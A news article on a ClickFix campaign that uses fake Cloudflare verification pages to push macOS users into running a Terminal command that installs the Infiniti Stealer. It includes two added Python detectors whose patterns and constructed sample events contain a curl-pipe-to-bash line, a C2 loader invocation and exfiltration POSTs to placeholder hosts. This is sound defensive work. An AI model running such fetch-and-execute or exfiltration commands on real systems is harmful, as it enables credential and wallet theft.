In a recent cybersecurity development, macOS users are being targeted by a new campaign using Cloudflare-themed verification pages to deliver a Python-based information stealer, according to a report by Malwarebytes.
How the Attack Unfolds
The attack initiates with a counterfeit CAPTCHA page that mimics a legitimate Cloudflare human verification process. This page prompts users to paste and execute a command in the Terminal, creating an illusion of authenticity.
Known as ClickFix, this technique predominantly leverages social engineering to deceive users into executing harmful commands. Initially used against Windows systems, this method has been adapted for macOS since August 2024, with increasing sophistication.
Execution and Payload
The fraudulent verification page provides explicit instructions for macOS users to engage with the Terminal, leading to the execution of a malicious command. This command fetches a Bash script from a remote server, which in turn decodes a payload, places a binary in a temporary directory, and executes it.
The script passes along the necessary command-and-control server details and authentication tokens, then deletes itself and terminates the Terminal session. The binary is a loader built with Nuitka, which compiles Python code into a native binary and thereby complicates static analysis.
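The chain above (a command pasted into Terminal that fetches a remote script, decodes a payload, drops a binary into a temporary directory, runs it, deletes itself and kills Terminal) is easier to detect as a whole than stage by stage, since developers also pipe curl into a shell. The following is an added detection example, not code from the Malwarebytes report or from the malware; it scores constructed process-start events against the described stages and only alerts when several stages occur beneath a Terminal process. The event schema, hostnames and paths are assumptions.

```python
"""
Heuristic detector for the ClickFix-style macOS execution chain.
Input is a list of constructed process-start events (dicts with pid, ppid,
name, cmdline); the schema is an assumption, not a real EDR format.
"""
import re
from dataclasses import dataclass, field

# One regex per stage of the described chain. A single hit is weak evidence
# (curl | sh is common), so the verdict is based on how many stages co-occur.
STAGES = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b.*https?://", re.I),
    "decode": re.compile(r"\bbase64\b.*(-d|--decode)|\bopenssl\s+enc\b.*-d", re.I),
    "tmp_exec": re.compile(r"(^|\s)(/private)?/tmp/\S+|\$TMPDIR/\S+", re.I),
    "self_delete": re.compile(r"\brm\s+(-f\s+)?(\"\$0\"|\$0|\S+\.sh)\b", re.I),
    "kill_terminal": re.compile(r"\b(pkill|killall)\b.*\bTerminal\b", re.I),
}


@dataclass
class Verdict:
    score: int
    stages: list = field(default_factory=list)
    terminal_descendant: bool = False
    alert: bool = False


def _has_terminal_ancestor(event, by_pid):
    """Walk the parent chain and report whether Terminal.app is an ancestor."""
    seen = set()
    ppid = event["ppid"]
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        parent = by_pid[ppid]
        if parent["name"] == "Terminal":
            return True
        ppid = parent["ppid"]
    return False


def analyze(events, threshold=3):
    """Score a batch of process events; alert when >= threshold stages appear
    under a Terminal process (the ClickFix entry point)."""
    by_pid = {e["pid"]: e for e in events}
    stages_hit = set()
    terminal = False
    for e in events:
        for stage, pattern in STAGES.items():
            if pattern.search(e["cmdline"]):
                stages_hit.add(stage)
                if _has_terminal_ancestor(e, by_pid):
                    terminal = True
    score = len(stages_hit)
    return Verdict(score=score, stages=sorted(stages_hit),
                   terminal_descendant=terminal,
                   alert=terminal and score >= threshold)


# Constructed sample: the chain described in the report, with placeholder hosts.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "name": "Terminal",
     "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 101, "ppid": 100, "name": "zsh", "cmdline": "-zsh"},
    {"pid": 102, "ppid": 101, "name": "bash",
     "cmdline": 'bash -c "curl -fsSL https://verify.example.invalid/check.sh | bash"'},
    {"pid": 103, "ppid": 102, "name": "base64", "cmdline": "base64 -d"},
    {"pid": 104, "ppid": 102, "name": "loader",
     "cmdline": "/private/tmp/.x/loader --c2 c2.example.invalid --token PLACEHOLDER_TOKEN"},
    {"pid": 105, "ppid": 102, "name": "rm", "cmdline": "rm -f /private/tmp/check.sh"},
    {"pid": 106, "ppid": 102, "name": "killall", "cmdline": "killall Terminal"},
]

# Constructed benign sample: a developer installing a toolchain via curl | sh.
BENIGN_EVENTS = [
    {"pid": 100, "ppid": 1, "name": "Terminal", "cmdline": "Terminal"},
    {"pid": 101, "ppid": 100, "name": "zsh", "cmdline": "-zsh"},
    {"pid": 102, "ppid": 101, "name": "sh",
     "cmdline": "sh -c 'curl --proto =https -sSf https://installer.example.invalid | sh'"},
]

if __name__ == "__main__":
    for label, events in (("clickfix", SAMPLE_EVENTS), ("benign", BENIGN_EVENTS)):
        print(label, analyze(events))
```

The threshold of three stages is a tuning choice: a fetch-decode-execute triple under Terminal is already unusual for interactive use, while a lone curl | sh is not.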
The Impact of Infiniti Stealer
Upon execution, the loader activates the final payload, identified as the Infiniti Stealer malware. This Python-based stealer targets sensitive data such as browser credentials, Keychain information, cryptocurrency wallets, and secrets in developer files, and it also captures screenshots.
Information gathered is transmitted to a command-and-control server via HTTP POST requests. Subsequently, a notification is dispatched to a Telegram channel, and the captured credentials are queued for further cracking.
Infiniti Stealer employs strategies like randomized execution delays and checks for analysis environments to avoid detection. Malwarebytes highlights the adaptation of Windows-targeted techniques like ClickFix for macOS users, alongside new methods such as compiling Python into native applications, which complicates detection and analysis. This trend could signal more such attacks in the future.
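The exfiltration path described above (HTTP POST to a command-and-control server, then a Telegram notification) can be checked on the network side independently of the loader. The following is an added example, not code from the report or from the malware: it inspects constructed per-process connection records and flags POSTs made by an executable running out of a temporary directory, as well as any process other than the Telegram client contacting the Telegram Bot API host. The record schema, process paths and C2 hostname are assumptions.

```python
"""
Network-side check for the stealer's exfiltration behaviour.
Records are constructed dicts (pid, process_path, method, url); the schema is
an assumption standing in for proxy or endpoint network telemetry.
"""
from dataclasses import dataclass
from urllib.parse import urlsplit

# macOS temp locations a dropped loader typically runs from.
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/private/var/folders/", "/var/folders/")
# Real Telegram Bot API host; normal for the Telegram app, suspicious for a stray binary.
TELEGRAM_API_HOST = "api.telegram.org"
ALLOWED_TELEGRAM_PROCS = {"Telegram"}


@dataclass(frozen=True)
class Finding:
    pid: int
    process_path: str
    reason: str


def _is_temp_executable(path):
    return path.startswith(TEMP_PREFIXES)


def inspect_connections(records):
    """Return a Finding for every record matching one of the two heuristics."""
    findings = []
    for r in records:
        host = urlsplit(r["url"]).hostname or ""
        proc = r["process_path"]
        name = proc.rsplit("/", 1)[-1]
        if r["method"].upper() == "POST" and _is_temp_executable(proc):
            findings.append(Finding(r["pid"], proc,
                                    f"HTTP POST from temp-dir executable to {host}"))
        if host == TELEGRAM_API_HOST and name not in ALLOWED_TELEGRAM_PROCS:
            findings.append(Finding(r["pid"], proc,
                                    "Telegram Bot API contacted by non-Telegram process"))
    return findings


def suspicious_pids(records):
    """Distinct PIDs with at least one finding, for triage."""
    return sorted({f.pid for f in inspect_connections(records)})


# Constructed sample records with placeholder hosts and a placeholder bot token.
SAMPLE_RECORDS = [
    {"pid": 104, "process_path": "/private/tmp/.x/loader", "method": "POST",
     "url": "https://c2.example.invalid/upload"},
    {"pid": 104, "process_path": "/private/tmp/.x/loader", "method": "GET",
     "url": "https://api.telegram.org/botPLACEHOLDER_TOKEN/sendMessage"},
    {"pid": 200, "process_path": "/Applications/Telegram.app/Contents/MacOS/Telegram",
     "method": "GET", "url": "https://api.telegram.org/botPLACEHOLDER_TOKEN/getMe"},
    {"pid": 300, "process_path": "/Applications/Safari.app/Contents/MacOS/Safari",
     "method": "POST", "url": "https://www.example.com/login"},
]

if __name__ == "__main__":
    for f in inspect_connections(SAMPLE_RECORDS):
        print(f)
```

Because the stealer randomizes its execution delay, the POST and the Telegram call may be separated in time from the initial Terminal activity; correlating on the process path rather than on a time window keeps the two findings attached to the same binary.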
